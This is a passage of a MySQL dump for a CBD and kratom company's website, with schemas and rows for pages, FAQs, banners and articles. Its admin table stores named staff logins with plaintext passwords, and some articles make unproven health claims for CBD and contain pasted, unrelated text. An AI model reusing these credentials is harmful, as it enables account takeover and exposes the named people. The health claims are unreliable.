various fields to obtain a standardized products and the best quality and satisfy every profitable opportunities and readiness in the global market.&lt;/p&gt;\r\n\r\n&lt;p&gt;&lt;br /&gt;\r\nIn addition to having a factory producing premium extracts, we also provide OEM manufacturing services and one-stop service.&lt;/p&gt;\r\n','N','1',1,'0','0000-00-00 00:00:00','2023-07-15 06:25:16','Home Overview',''),(2,'Our Vision and Mission','our-vision-and-mission','vision.jpg','&lt;p&gt;Our vision is to be a leading provider of natural wellness and holistic lifestyle products, pioneering innovative solutions that drive sustainable practices, and global well-being.&lt;/p&gt;\r\n\r\n&lt;p&gt;&amp;nbsp;&lt;/p&gt;\r\n\r\n&lt;p&gt;Our mission is to provide you with the highest quality products, knowledge, and support to help you achieve optimal well-being and lead a balanced, vibrant life.&lt;/p&gt;\r\n\r\n&lt;p&gt;&amp;nbsp;&lt;/p&gt;\r\n','N','1',1,'0','0000-00-00 00:00:00','2023-07-14 12:03:20','Vision and Mission',''),(3,'Competitive Landscape','competitive-landscape','competitive-landscape.jpg','&lt;p&gt;The natural remedies continue to work and are sought after by people all over the world who have given up on modern medicine. As a result,It was used as traditional medical herb and was used among workers&lt;br /&gt;\r\nin the agricultural sector. Farmers use Kratom as a stimulant drug for&lt;br /&gt;\r\nbe able to work under the burning sun to relieve pain and ease&lt;br /&gt;\r\nmuscle ache&lt;/p&gt;\r\n','N','1',1,'0','0000-00-00 00:00:00','2023-07-14 11:12:09','Competitive Landscape',''),(4,'Problem Visualization & Solution','problem-visualization-&amp;-solution','problem-visualation.jpg','&lt;p&gt;ShardaVeda will investigate the viability of effective standalone usage of these natural/herbal plants as part of our research. Furthermore, the research will concentrate on blending these natural/herbal plants for newer medicinal applications.&lt;/p&gt;\r\n','N','1',1,'0','0000-00-00 00:00:00','2023-07-14 11:12:49','Problem Visualization & Solution','');

/*Table structure for table `tbl_admin` */

DROP TABLE IF EXISTS `tbl_admin`;

CREATE TABLE `tbl_admin` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `userName` varchar(120) DEFAULT NULL,
  `password` varchar(200) DEFAULT NULL,
  `first_name` varchar(200) DEFAULT NULL,
  `last_name` varchar(150) DEFAULT NULL,
  `contact_number` varchar(15) DEFAULT NULL,
  `email_id` varchar(210) DEFAULT NULL,
  `role_id` varchar(50) DEFAULT NULL,
  `status` tinyint(4) NOT NULL DEFAULT '1',
  `is_deleted` tinyint(4) NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `ip_address` varchar(100) DEFAULT NULL,
  `last_login` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `last_modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `added_by` tinyint(4) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_admin` */

insert  into `tbl_admin`(`id`,`userName`,`password`,`first_name`,`last_name`,`contact_number`,`email_id`,`role_id`,`status`,`is_deleted`,`createdon`,`ip_address`,`last_login`,`last_modifiedon`,`added_by`) values (1,'amit.verma@shardatech.org','123456','Amit','Verma','9999999999','amit.verma@shardatech.org','1',1,0,'2020-10-28 11:27:56',NULL,'2020-10-22 06:24:10','2020-10-22 06:24:10',NULL),(2,'Imran@shardatech.org','imran@123','Imran ','','9999999999','Imran@shardatech.org','1',1,0,'2020-11-09 06:41:06',NULL,'2020-11-09 06:41:06','2020-11-09 06:41:06',NULL),(3,'rehbar@shardatech.org','123456','Rehbar','','9999999999','rehbar@shardatech.org','1',1,0,'2023-07-14 10:27:46',NULL,'2023-07-14 10:27:46','2023-07-14 10:27:46',NULL);

/*Table structure for table `tbl_approvals` */

DROP TABLE IF EXISTS `tbl_approvals`;

CREATE TABLE `tbl_approvals` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `approval_title` varchar(250) NOT NULL,
  `approval_url` varchar(250) NOT NULL,
  `approval_image` varchar(100) DEFAULT NULL,
  `approval_description` text,
  `display_order` int(11) DEFAULT NULL,
  `is_display_home` enum('0','1') DEFAULT '0',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `business_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_approvals` */

/*Table structure for table `tbl_assign_role` */

DROP TABLE IF EXISTS `tbl_assign_role`;

CREATE TABLE `tbl_assign_role` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `role_name` varchar(120) DEFAULT NULL,
  `custom` varchar(200) DEFAULT NULL,
  `display_name` varchar(200) DEFAULT NULL,
  `display_order` tinyint(4) DEFAULT NULL,
  `module_ids` varchar(250) DEFAULT NULL,
  `display_icon` varchar(250) DEFAULT NULL,
  `status` tinyint(4) NOT NULL DEFAULT '1',
  `is_deleted` tinyint(4) NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_assign_role` */

insert  into `tbl_assign_role`(`id`,`role_name`,`custom`,`display_name`,`display_order`,`module_ids`,`display_icon`,`status`,`is_deleted`,`createdon`,`modifiedon`) values (1,'SuperAdmin',NULL,NULL,NULL,'ALL',NULL,1,0,'2020-10-22 07:13:04','2020-10-22 07:13:04'),(2,'Admin',NULL,NULL,NULL,'2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31,32',NULL,1,0,'2020-11-27 07:43:05','2020-10-22 07:15:29');

/*Table structure for table `tbl_awards` */

DROP TABLE IF EXISTS `tbl_awards`;

CREATE TABLE `tbl_awards` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `slug` varchar(150) NOT NULL,
  `award_image` varchar(150) NOT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `award_date` date DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_awards` */

insert  into `tbl_awards`(`id`,`title`,`slug`,`award_image`,`description`,`is_display_home`,`status`,`display_order`,`is_deleted`,`createdon`,`modifiedon`,`award_date`) values (1,'Are CBD oil, hemp, and other CBD products legal in India?','are-cbd-oil-hemp-and-other-cbd-products-legal-in-india','','&lt;p&gt;The Narcotic Drugs and Psychotropic Substances Act of 1985 (NDPS Act) prohibits the use of cannabis for recreational purposes. The NDPS Act, on the other hand, does not apply to cannabis plant leaves and seeds. If the CBD is taken from the cannabis leaves, then it is not technically unlawful. CBD oil that has been licensed under the Drugs and Cosmetics Act of 1940 can be used legally. However, the use of cannabis as a medicine is not much prevalent in India.&lt;/p&gt;\r\n','N','1',1,'0','0000-00-00 00:00:00','2021-09-07 06:10:11',NULL),(2,'Will CBD get me high or stoned?','will-cbd-get-me-high-or-stoned','','&lt;p&gt;CBD can be derived from cannabis plants, but it lacks the same potency as marijuana or THC in terms of inducing ecstasy or making people high. You won\'t get high if you use a CBD-infused oil, tincture, edible, or other product, but it may help you relax or feel less nervous.&lt;/p&gt;\r\n','N','1',3,'0','0000-00-00 00:00:00','2021-09-07 06:10:23',NULL),(3,'What is the difference between THC and CBD?','what-is-the-difference-between-thc-and-cbd','','&lt;p&gt;Tetrahydrocannabinol (THC) and cannabidiol (CBD) are two natural chemicals found in Cannabis plants. Hemp or cannabis can be used to extract CBD.&lt;/p&gt;\r\n\r\n&lt;p&gt;Cannabis sativa is the plant that produces hemp and cannabis. THC levels in legal hemp must be less than 0.3 percent. CBD can be found in a variety of forms, including gels, gummies, oils, supplements, extracts, and more.&lt;/p&gt;\r\n\r\n&lt;p&gt;THC (tetrahydrocannabinol) is the psychoactive ingredient in cannabis that causes a high. It is possible to consume it by smoking cannabis. Oils, foods, tinctures, pills, and other forms are also available.&lt;/p&gt;\r\n\r\n&lt;p&gt;Both substances interact with the endocannabinoid system in your body, but their effects are vastly different.&lt;/p&gt;\r\n','N','1',2,'0','0000-00-00 00:00:00','2021-09-07 06:08:32',NULL),(4,'Can I drive while using CBD Oil?','can-i-drive-while-using-cbd-oil','','&lt;p&gt;Patients who are taking CBD-only treatments are allowed to drive if they are not impaired. Patients should discuss CBD use and the risk of impairment with their treating physicians because CBD can cause sleepiness, exhaustion, and low blood pressure.&lt;/p&gt;\r\n','N','1',4,'0','0000-00-00 00:00:00','2021-09-07 06:10:31',NULL);

/*Table structure for table `tbl_banners` */

DROP TABLE IF EXISTS `tbl_banners`;

CREATE TABLE `tbl_banners` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `banner_name` varchar(250) NOT NULL,
  `banner_url` varchar(250) NOT NULL,
  `banner_code` varchar(50) NOT NULL,
  `banner_image` varchar(100) NOT NULL,
  `banner_type` char(3) DEFAULT NULL,
  `banner_text` text,
  `display_order` char(3) DEFAULT NULL,
  `button_url2` varchar(200) DEFAULT NULL,
  `button_url` varchar(200) DEFAULT NULL,
  `button_label2` varchar(200) DEFAULT NULL,
  `button_label` varchar(200) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `banner_for` enum('0','1','2','3') DEFAULT '0',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_banners` */

insert  into `tbl_banners`(`id`,`banner_name`,`banner_url`,`banner_code`,`banner_image`,`banner_type`,`banner_text`,`display_order`,`button_url2`,`button_url`,`button_label2`,`button_label`,`status`,`banner_for`,`is_deleted`,`createdon`,`modifiedon`) values (1,'awards banner','','','cup-man-achievement-success-honor.jpg','2','','1','','','','','0','1','1','2020-11-10 08:26:16','2020-11-10 08:26:16'),(2,'awards banner','','','cup-man-achievement-success-honor.jpg','2','','1','','','','','0','1','1','2020-11-16 14:54:00','2020-11-16 14:54:00'),(3,'Sustainability Banner','','','sustainable.jpg','14','Sustainable Living','2','','','','','0','1','1','2020-11-26 16:22:43','2020-11-26 16:22:43'),(4,'Home Banner','13.126.253.70/maxwell/product','Learn More','home-banner.jpg','4','&lt;h1&gt;Maxwell Biotech&lt;/h1&gt;\r\n&lt;p&gt;We create high quality CBD products designed to fit into your lifestyle, effortlessly.&lt;/p&gt;','1','','','','','1','1','0','2021-08-27 08:49:55','2021-08-27 08:49:55');

/*Table structure for table `tbl_business` */

DROP TABLE IF EXISTS `tbl_business`;

CREATE TABLE `tbl_business` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `slug` varchar(200) NOT NULL,
  `category` varchar(250) DEFAULT NULL,
  `description` text,
  `business_image` varchar(100) DEFAULT NULL,
  `is_display_home` enum('N','Y') NOT NULL DEFAULT 'N',
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `address` varchar(250) DEFAULT NULL,
  `short_description` text,
  `name` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `video_file` varchar(100) DEFAULT NULL,
  `youtube_url` varchar(100) DEFAULT NULL,
  `contact` text,
  `overview` text,
  `site_logo` varchar(100) DEFAULT NULL,
  `mission_vision` text,
  `core_values` text,
  `site_url` varchar(100) DEFAULT NULL,
  `impact_name` varchar(250) DEFAULT NULL,
  `video_name` varchar(200) DEFAULT NULL,
  `video_text` varchar(250) DEFAULT NULL,
  `video_url` varchar(200) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_business` */

/*Table structure for table `tbl_business_category` */

DROP TABLE IF EXISTS `tbl_business_category`;

CREATE TABLE `tbl_business_category` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `category_name` varchar(250) NOT NULL,
  `slug` varchar(100) NOT NULL,
  `display_order` varchar(10) NOT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_business_category` */

/*Table structure for table `tbl_contact_form` */

DROP TABLE IF EXISTS `tbl_contact_form`;

CREATE TABLE `tbl_contact_form` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(250) DEFAULT NULL,
  `company` text NOT NULL,
  `email` varchar(250) NOT NULL,
  `phone` varchar(100) NOT NULL,
  `message` text NOT NULL,
  `source` varchar(100) DEFAULT NULL,
  `created` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modified` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `status` enum('0','1') NOT NULL DEFAULT '0',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_contact_form` */

/*Table structure for table `tbl_culture` */

DROP TABLE IF EXISTS `tbl_culture`;

CREATE TABLE `tbl_culture` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `slug` varchar(150) NOT NULL,
  `culture_image` varchar(150) DEFAULT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `category` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_culture` */

/*Table structure for table `tbl_downloadcenter` */

DROP TABLE IF EXISTS `tbl_downloadcenter`;

CREATE TABLE `tbl_downloadcenter` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(250) NOT NULL,
  `download_file_name` varchar(150) NOT NULL,
  `description` text NOT NULL,
  `category` varchar(100) DEFAULT NULL,
  `custom` varchar(250) NOT NULL,
  `school_id` varchar(10) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `published_on` date DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_downloadcenter` */

/*Table structure for table `tbl_happenings` */

DROP TABLE IF EXISTS `tbl_happenings`;

CREATE TABLE `tbl_happenings` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `school_id` varchar(90) DEFAULT NULL,
  `title` varchar(200) NOT NULL,
  `slug` varchar(200) NOT NULL,
  `section` char(5) NOT NULL,
  `description` text,
  `excerpt` varchar(200) DEFAULT NULL,
  `happening_image` varchar(100) DEFAULT NULL,
  `pdf_name` varchar(200) DEFAULT NULL,
  `pdf_name1` varchar(150) DEFAULT NULL,
  `pdf_name2` varchar(150) DEFAULT NULL,
  `is_display_home` enum('N','Y') NOT NULL DEFAULT 'N',
  `display_order` int(11) DEFAULT NULL,
  `seo_title` varchar(200) NOT NULL,
  `seo_keywords` varchar(600) NOT NULL,
  `seo_description` varchar(600) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `news_date` datetime NOT NULL,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_happenings` */

insert  into `tbl_happenings`(`id`,`school_id`,`title`,`slug`,`section`,`description`,`excerpt`,`happening_image`,`pdf_name`,`pdf_name1`,`pdf_name2`,`is_display_home`,`display_order`,`seo_title`,`seo_keywords`,`seo_description`,`status`,`is_deleted`,`news_date`,`created`,`updated`) values (1,NULL,'Each Kratom Strain has it\'s Own Strength','each-kratom-strain-has-it-s-own-strength','1','&lt;div class=&quot;flex flex-grow flex-col gap-3&quot;&gt;\r\n&lt;div class=&quot;min-h- flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4&quot;&gt;\r\n&lt;div class=&quot;markdown prose w-full break-words dark:prose-invert light&quot;&gt;\r\n&lt;p&gt;Yes, different kratom strains are believed to have their own unique characteristics and potential effects. However, it\'s important to note that the effects of kratom can vary among individuals, and the strain\'s effects are not guaranteed or scientifically proven.&lt;/p&gt;\r\n\r\n&lt;p&gt;Here are some commonly recognized kratom strains and their reputed effects:&lt;/p&gt;\r\n\r\n&lt;ol&gt;\r\n	&lt;li&gt;\r\n	&lt;p&gt;Bali Kratom: Often associated with relaxation, pain relief, and mild sedation.&lt;/p&gt;\r\n	&lt;/li&gt;\r\n	&lt;li&gt;\r\n	&lt;p&gt;Maeng Da Kratom: Known for its potential energizing effects, increased focus, and mood enhancement.&lt;/p&gt;\r\n	&lt;/li&gt;\r\n	&lt;li&gt;\r\n	&lt;p&gt;Thai Kratom: Traditionally believed to have stimulating and energizing properties.&lt;/p&gt;\r\n	&lt;/li&gt;\r\n	&lt;li&gt;\r\n	&lt;p&gt;Malay Kratom: Often associated with mood elevation, pain relief, and mild energy boost.&lt;/p&gt;\r\n	&lt;/li&gt;\r\n	&lt;li&gt;\r\n	&lt;p&gt;Borneo Kratom: Known for its potential relaxing and pain-relieving effects.&lt;/p&gt;\r\n	&lt;/li&gt;\r\n	&lt;li&gt;\r\n	&lt;p&gt;Indo Kratom: Generally characterized as having a balanced effect, with potential for both relaxation and stimulation.&lt;/p&gt;\r\n	&lt;/li&gt;\r\n&lt;/ol&gt;\r\n\r\n&lt;p&gt;It\'s important to remember that these effects are anecdotal and can vary depending on the specific batch, quality, and individual factors. Additionally, the effects of kratom can also be dose-dependent, meaning that lower doses may produce different effects than higher doses.&lt;/p&gt;\r\n\r\n&lt;p&gt;If you\'re considering using kratom, it\'s essential to approach it with caution, do your research, and be aware of potential risks and regulations associated with its use in your location. Consulting with a healthcare professional is advisable to get personalized guidance and to ensure your safety.&lt;/p&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;',NULL,'14.jpg',NULL,NULL,NULL,'Y',1,'','','','1','0','2023-07-12 00:00:00','2021-08-24 00:00:00','2023-07-14 00:00:00'),(2,NULL,'What is Kratom?','what-is-kratom','1','&lt;div class=&quot;flex flex-grow flex-col gap-3&quot;&gt;\r\n&lt;div class=&quot;min-h- flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4&quot;&gt;\r\n&lt;div class=&quot;markdown prose w-full break-words dark:prose-invert light&quot;&gt;\r\n&lt;p&gt;Kratom, scientifically known as Mitragyna speciosa, is a tropical evergreen tree native to Southeast Asia, particularly in countries like Thailand, Malaysia, Indonesia, and Papua New Guinea. The leaves of the kratom tree have been traditionally used for their stimulant and opioid-like effects by the indigenous populations in these regions.&lt;/p&gt;\r\n\r\n&lt;p&gt;Kratom leaves contain active compounds called alkaloids, with mitragynine and 7-hydroxymitragynine being the most prevalent and well-studied. These alkaloids interact with opioid receptors in the brain, producing pain-relieving and mood-altering effects. Kratom is typically consumed by chewing the fresh leaves, drying and crushing them into a powder, or brewing them into a tea. It can also be found in the form of capsules, tablets, or extracts.&lt;/p&gt;\r\n\r\n&lt;p&gt;Kratom is used for various purposes, including pain relief, relaxation, mood enhancement, and increasing energy levels. It is also sometimes used to alleviate symptoms of opioid withdrawal, as it acts on the same receptors but with milder effects. However, it\'s important to note that the scientific research on kratom\'s effects and potential benefits is limited, and there is ongoing debate and regulatory scrutiny surrounding its use.&lt;/p&gt;\r\n\r\n&lt;p&gt;It\'s worth mentioning that kratom has been associated with potential risks and adverse effects. These can include nausea, constipation, loss of appetite, dry mouth, increased urination, sweating, dizziness, and sedation. In some cases, more severe effects like liver toxicity and respiratory depression have been reported, although these are relatively rare. Additionally, regular and prolonged use of kratom can lead to dependence and withdrawal symptoms when discontinued.&lt;/p&gt;\r\n\r\n&lt;p&gt;The legal status of kratom varies across different countries and regions. While it is legal in some places, it is considered a controlled substance or banned in others. It\'s crucial to research and understand the legal regulations and potential risks associated with kratom in your specific location before considering its use. Consulting with a healthcare professional is also advisable to get personalized guidance and to ensure your safety.&lt;/p&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;',NULL,'13.jpeg',NULL,NULL,NULL,'Y',2,'','','','1','0','2023-07-14 00:00:00','2021-08-24 00:00:00','2023-07-14 00:00:00'),(3,NULL,'The CBD Craze','the-cbd-craze','1','&lt;p&gt;Long before CBD had become a trendy wellness elixir found in juice and moisturizer and ice cream and dog treats; before corporate chains like Walgreens and Sephora had decided to sell it; and way before Kim Kardashian West had thrown a CBD-themed baby shower, a ragtag crew of activists, doctors, writers and marijuana farmers met up on an early winter evening in 2011. They sat in a circle at a house in the hills a few hours north of San Francisco &mdash; where wine country becomes weed country &mdash; to discuss the therapeutic potential of CBD, and how to get people to take it seriously.&lt;/p&gt;\r\n\r\n&lt;p&gt;Several studies in rodents and in cell cultures had suggested that CBD, a nonintoxicating compound from the cannabis plant more formally known as cannabidiol, could protect the nervous system, modulate blood flow, slow the growth of cancer cells and provide relief from seizures, pain, anxiety and inflammation.&lt;/p&gt;\r\n\r\n&lt;p&gt;&ldquo;We were talking about, &lsquo;What can we do with this? &rdquo; recalled Samantha Miller, who hosted the event at her split-level house, wedged between redwoods and a creek below. A headstrong biochemist, she had been growing marijuana since the age of 14 and had just quit a six-figure job to start her own cannabis testing lab.&lt;br /&gt;\r\nImage&lt;br /&gt;\r\nSamantha Miller at her home in northern California.&lt;br /&gt;\r\nSamantha Miller at her home in northern California.Credit...Kelsey McClellan for The New York Times&lt;br /&gt;\r\nImage&lt;br /&gt;\r\nA ragtag crew of activists, doctors, writers and marijuana farmers met to discuss the potential of CBD in 2011 at Samantha Millers home.&lt;br /&gt;\r\nA ragtag crew of activists, doctors, writers and marijuana farmers met to discuss the potential of CBD in 2011 at Samantha Millers home.Credit...Kelsey McClellan for The New York Times&lt;/p&gt;\r\n\r\n&lt;p&gt;After two years of tracking down high-CBD pot plants and building momentum, Ms. Miller and the group wanted to devise ways to persuade more farmers to grow strains with CBD &mdash; which had largely been bred out of American pot since it doesnt get you high. In addition to convincing marijuana dispensaries to widely carry CBD, they wanted to educate the public about its promising benefits.&lt;/p&gt;\r\n\r\n&lt;p&gt;Advertisement&lt;br /&gt;\r\nContinue reading the main story&lt;/p&gt;\r\n\r\n&lt;p&gt;As the group of ten or so brainstormed, a balloon of vaporized pot was passed in one direction and a bong in the other.&lt;/p&gt;\r\n\r\n&lt;p&gt;&ldquo;There was a strong sense that this was really going to be something, if when people use these strains they have any kind of experience like the mice did in the laboratories,&rdquo; said Martin Lee, a writer who at the time had been finishing a book about the social history of marijuana for Simon &amp;amp; Schuster.&lt;/p&gt;\r\n\r\n&lt;p&gt;Near him was Stacey Kerr, a physician with flowing silver hair who served as treasurer of the Society of Cannabis Clinicians, as well as Wade Laughter, a soft-spoken man in glasses who had started cultivating pot for his glaucoma in the mid-90s. Mr. Laughter and Lawrence Ringo, an old-school hippie grower, were some of the first Americans to intentionally cultivate plants higher in CBD than in THC &mdash; the compound that does get you high. Both pledged to keep their strains available for other growers at cheap prices. (Mr. Ringo said he would sell his seeds for as little as $5.)&lt;/p&gt;\r\n\r\n&lt;p&gt;Finally, there was Fred Gardner, a writer who had recruited almost all of these people to the CBD cause. A Harvard-educated former antiwar activist, now 78, Mr. Gardner had been writing about CBD since the late 1990s for publications like Synapse, the U.C. San Francisco weekly. For years, hed been determined to connect the nascent CBD research he heard about at symposiums abroad with the medical marijuana movement in California. And with this group, finally, it seemed to be coming together.&lt;br /&gt;\r\nEditors Picks&lt;br /&gt;\r\nMy Roommates Have Been Listening to My Therapy Sessions. Is That OK?&lt;br /&gt;\r\nSea Scallops Farmed in Maine Arent Just Sustainable. Theyre Helping Their Habitat.&lt;br /&gt;\r\nThe Cotton Tote Crisis&lt;br /&gt;\r\nContinue reading the main story&lt;/p&gt;\r\n\r\n&lt;p&gt;Advertisement&lt;br /&gt;\r\nContinue reading the main story&lt;/p&gt;\r\n\r\n&lt;p&gt;Ms. Miller spent the months after this meeting leading hundreds of CBD seminars for farmers; Dr. Kerr began informal patient surveys to track how CBD made people feel; and as he finished his book, Mr. Lee often traveled around with Mr. Laughter and Mr. Ringos high-CBD plants and seeds, spreading the gospel at pot shops across the West.&lt;/p&gt;\r\n\r\n&lt;p&gt;&ldquo;I was aware that this was a pretty special moment,&rdquo; Dr. Kerr told me, talking about the night at Ms. Millers. &ldquo;That it was the beginning of something big, and we were there to see it.&rdquo;&lt;/p&gt;\r\n\r\n&lt;p&gt;At the time of Samantha Millers summit in 2011, THC was the sole chemical &ldquo;face&rdquo; of the plant. Cannabis containing significant amounts of CBD was still rare. Police raids and federal prosecution of medical marijuana businesses were still common. And because CBD doesnt get you high, it was easy to miss; hardly anyone outside of pharmaceutical companies and academia had heard of it.&lt;/p&gt;\r\n\r\n&lt;p&gt;In the nine years since that night in the woods, one of the groups biggest goals has clearly been accomplished: People know about CBD.&lt;/p&gt;',NULL,'article-2.jpg',NULL,NULL,NULL,'Y',3,'','','','1','0','2023-07-14 00:00:00','2023-07-14 00:00:00','0000-00-00 00:00:00'),(4,NULL,'CBD oil benefits list','cbd-oil-benefits-list','1','&lt;p&gt;Cannabidiol (CBD) oil is a product thats derived from cannabis. Its a type of cannabinoid, which are the chemicals naturally found in marijuana plants. Even though it comes from marijuana plants, CBD doesnt create a &ldquo;high&rdquo; effect or any form of intoxication &mdash; thats caused by another cannabinoid, known as THC.&lt;br /&gt;\r\n&lt;br /&gt;\r\nTheres some controversy around cannabis products like CBD oil because of recreational marijuana use. But theres growing awareness about the possible health benefits of CBD oil. Heres what you need to know about six potential medical uses of CBD and where the research stands:&lt;br /&gt;\r\n&lt;br /&gt;\r\nThe Tata Trusts have been engaged for decades in the field of public health. They develop and support multi-pronged initiatives to address issues that cover both communicable and non-communicable diseases and range widely from malaria and tuberculosis to cancer, maternal and child health and mental health. The goal is to strengthen healthcare delivery capability through a multipronged approach that includes direct implementation, institution building, partnerships, and adoption of technology and innovation.&lt;/p&gt;\r\n\r\n&lt;h4&gt;1. Anxiety relief&lt;/h4&gt;\r\n\r\n&lt;p&gt;Cannabidiol (CBD) oil is a product thats derived from cannabis. Its a type of cannabinoid, which are the chemicals naturally found in marijuana plants. Even though it comes from marijuana plants, CBD doesnt create a &ldquo;high&rdquo; effect or any form of intoxication &mdash; thats caused by another cannabinoid, known as THC.&lt;/p&gt;',NULL,'article-3.jpg',NULL,NULL,NULL,'Y',4,'','','','1','0','2023-07-11 00:00:00','2023-07-14 00:00:00','0000-00-00 00:00:00'),(5,NULL,'Health Benefits of CBD Oil','health-benefits-of-cbd-oil','1','&lt;p&gt;CBD is primarily a relaxant that works especially well for inflammatory and neuropathic pain. The major benefit of CBD oil is to induce feelings of calmness and relaxation in the body. Since it also helps with inflammation, it is a great agent for healthy muscle recovery and supports pain management in conditions such as arthritis.&lt;br /&gt;\r\n&lt;br /&gt;\r\nIts relaxant properties help in controlling epileptic seizures, cancer-related symptoms, and keeping heart health in check. There are about 30 health conditions, studied as of now, that CBD can help with. The major ones among these are anxiety, depression, arthritis, chronic pain, epilepsy, MS, and sleep disorders.&lt;/p&gt;',NULL,'prod-6.jpg',NULL,NULL,NULL,'N',5,'','','','1','0','2023-07-01 00:00:00','2023-07-14 00:00:00','2023-07-14 00:00:00');

/*Table structure for table `tbl_happenings_sections` */

DROP TABLE IF EXISTS `tbl_happenings_sections`;

CREATE TABLE `tbl_happenings_sections` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `section_name` varchar(100) NOT NULL,
  `slug` varchar(100) NOT NULL,
  `section_type` enum('H','S') NOT NULL DEFAULT 'H',
  `display_order` varchar(10) NOT NULL,
  `seo_title` varchar(200) NOT NULL,
  `seo_keywords` varchar(600) NOT NULL,
  `seo_description` varchar(600) NOT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
